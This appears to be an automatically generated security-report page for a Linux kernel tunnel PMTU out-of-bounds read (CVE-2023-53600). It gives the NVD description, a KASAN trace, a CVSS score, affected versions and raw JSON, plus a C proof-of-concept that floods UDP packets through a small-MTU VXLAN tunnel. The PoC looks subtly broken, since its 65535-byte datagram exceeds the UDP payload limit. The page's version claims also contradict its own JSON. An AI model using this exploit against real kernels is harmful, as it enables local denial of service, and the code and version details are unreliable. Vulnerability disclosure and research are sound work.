Security Vulnerability Report
CVE-2023-53600 CVSS 7.1 HIGH

CVE-2023-53600

Published: 2025-10-04 16:15:57
Last Modified: 2026-03-23 18:21:42
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

tunnels: fix kasan splat when generating ipv4 pmtu error

If we try to emit an icmp error in response to a nonlinear skb, we get

BUG: KASAN: slab-out-of-bounds in ip_compute_csum+0x134/0x220
Read of size 4 at addr ffff88811c50db00 by task iperf3/1691
CPU: 2 PID: 1691 Comm: iperf3 Not tainted 6.5.0-rc3+ #309
[..]
 kasan_report+0x105/0x140
 ip_compute_csum+0x134/0x220
 iptunnel_pmtud_build_icmp+0x554/0x1020
 skb_tunnel_check_pmtu+0x513/0xb80
 vxlan_xmit_one+0x139e/0x2ef0
 vxlan_xmit+0x1867/0x2760
 dev_hard_start_xmit+0x1ee/0x4f0
 br_dev_queue_push_xmit+0x4d1/0x660
 [..]

ip_compute_csum() cannot deal with nonlinear skbs, so avoid it.
After this change, splat is gone and iperf3 is no longer stuck.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

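cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.9 inclusive, before 5.10.191) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.11 inclusive, before 5.15.127) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.16 inclusive, before 6.1.46) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2 inclusive, before 6.4.11) - VULNERABLE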
cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.5-rc4
Linux Kernel 6.5.0-rc3 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2023-53600 - Linux Kernel Tunnel PMTU OOB Read PoC
 * This PoC demonstrates triggering the KASAN out-of-bounds read
 * by sending large packets through a VXLAN tunnel that exceed MTU.
 *
 * Requirements:
 * - Linux kernel < 6.5-rc4 (vulnerable version)
 * - VXLAN interface configured
 * - KASAN enabled kernel (for detection)
 *
 * Setup VXLAN tunnel:
 *   ip link add vxlan100 type vxlan id 100 dev eth0 remote <remote_ip>
 *   ip addr add 192.168.100.1/24 dev vxlan100
 *   ip link set vxlan100 up
 *
 * Set small MTU to trigger PMTU error:
 *   ip link set vxlan100 mtu 100
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BUFFER_SIZE 65535
#define VXLAN_MTU 100

int main(int argc, char *argv[])
{
    int sockfd;
    struct sockaddr_in dest_addr;
    char *buffer;
    int ret;

    /* Create UDP socket for sending data through tunnel */
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("socket creation failed");
        return 1;
    }

    /* Allocate large buffer to exceed VXLAN MTU */
    buffer = malloc(BUFFER_SIZE);
    if (!buffer) {
        perror("malloc failed");
        close(sockfd);
        return 1;
    }
    memset(buffer, 'A', BUFFER_SIZE);

    /* Configure destination address through VXLAN tunnel */
    memset(&dest_addr, 0, sizeof(dest_addr));
    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = htons(5201); /* iperf3 port */
    inet_pton(AF_INET, "192.168.100.2", &dest_addr.sin_addr);

    /* Send large packets to trigger PMTU error generation */
    /* This will cause the kernel to attempt building an ICMP
     * PMTU error for the nonlinear skb, triggering the OOB read */
    for (int i = 0; i < 100; i++) {
        ret = sendto(sockfd, buffer, BUFFER_SIZE, 0,
                     (struct sockaddr *)&dest_addr, sizeof(dest_addr));
        if (ret < 0) {
            perror("sendto failed");
            break;
        }
    }

    printf("PoC execution completed. Check dmesg for KASAN report.\n");

    free(buffer);
    close(sockfd);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53600", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.603", "lastModified": "2026-03-23T18:21:42.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntunnels: fix kasan splat when generating ipv4 pmtu error\n\nIf we try to emit an icmp error in response to a nonliner skb, we get\n\nBUG: KASAN: slab-out-of-bounds in ip_compute_csum+0x134/0x220\nRead of size 4 at addr ffff88811c50db00 by task iperf3/1691\nCPU: 2 PID: 1691 Comm: iperf3 Not tainted 6.5.0-rc3+ #309\n[..]\n kasan_report+0x105/0x140\n ip_compute_csum+0x134/0x220\n iptunnel_pmtud_build_icmp+0x554/0x1020\n skb_tunnel_check_pmtu+0x513/0xb80\n vxlan_xmit_one+0x139e/0x2ef0\n vxlan_xmit+0x1867/0x2760\n dev_hard_start_xmit+0x1ee/0x4f0\n br_dev_queue_push_xmit+0x4d1/0x660\n [..]\n\nip_compute_csum() cannot deal with nonlinear skbs, so avoid it.\nAfter this change, splat is gone and iperf3 is no longer stuck."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.9", "versionEndExcluding": "5.10.191", "matchCriteriaId": "3E5F49AE-0B0F-4CE5-99C9-AF41E6414918"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.127", "matchCriteriaId": "945AF8F7-5328-4A14-B072-A5740192C9E1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.46", "matchCriteriaId": "D8B8CC90-9492-465C-81D4-10DA3B712286"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.11", "matchCriteriaId": "C36FD9E6-B6D7-4887-8F08-C1F64E139D5C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5850c391fd7e25662334cb3cbf29a62bcbff1084", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6a7ac3d20593865209dceb554d8b3f094c6bd940", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/da5f42a6e7485fbb7a6dbd6a2b3045e19e4df5cc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e95808121953410db8c59f0abfde70ac0d34222c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": 
"https://git.kernel.org/stable/c/fe6a9f7516735be9fdabab00e47ef7a3403a174d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}